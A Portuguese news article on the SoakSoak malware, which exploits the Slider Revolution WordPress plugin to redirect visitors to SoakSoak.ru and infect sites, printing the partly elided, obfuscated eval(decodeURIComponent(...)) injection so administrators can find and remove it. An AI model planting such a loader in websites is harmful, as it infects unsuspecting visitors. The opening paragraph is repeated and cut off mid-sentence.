Malware russo afeta sites baseados em WordPress

Segurança

Mais de 100 mil sites foram infectados por um novo tipo de malware originado na Rússia que atua diretamente sobre a plataforma WordPress, utilizada para confecção de sites e blogs por toda a indústria da tecnologia. Virulento, o novo malware espalhou-se perigosamente em menos de 48 horas. A ameaça é tão séria que o Google

Mais de 100 mil sites foram infectados por um novo tipo de malware originado na Rússia que atua diretamente sobre a plataforma WordPress, utilizada para confecção de sites e blogs por toda a indústria da tecnologia.

wordpress

Virulento, o novo malware espalhou-se perigosamente em menos de 48 horas. A ameaça é tão séria que o Google colocou na lista negra 11 mil domínios contaminados, na tentativa de conter a infecção.

O código explora uma vulnerabilidade do plugin Slider Revolution, presente em vários temas pagos para WordPress. Ao rodar, o plugin redireciona o tráfego a um site russo, o SoakSoak.ru, que baixa código em javascript e infecta o código-fonte do site atacado.

Com o site infectado, qualquer usuário que o visite é redirecionado secretamente ao SoakSoak.ru e tem o malware instalado em seu computador sem nem suspeitar.

Ainda não está claro o curso de ação do novo malware, porém é certo que envolve atividade ilícitas como roubo de dados e possível cooptação da máquina para redes zumbis (botnets).

Como o Slider Revolution vem incluso em temas premium, ele precisa ser atualizado manualmente. O código malicioso precisa ser removido para evitar o contágio.

O código malicioso que deve ser removido é o seguinte:

eval(decodeURIComponent 
("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E
%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%
09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%7
4%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));

Como pode sofrer mutações, é fundamental que administradores de sites feitos em WordPress redobrem a atenção em relação ao malware.


Clique para ler a bio do autor  Clique para fechar a bio do autor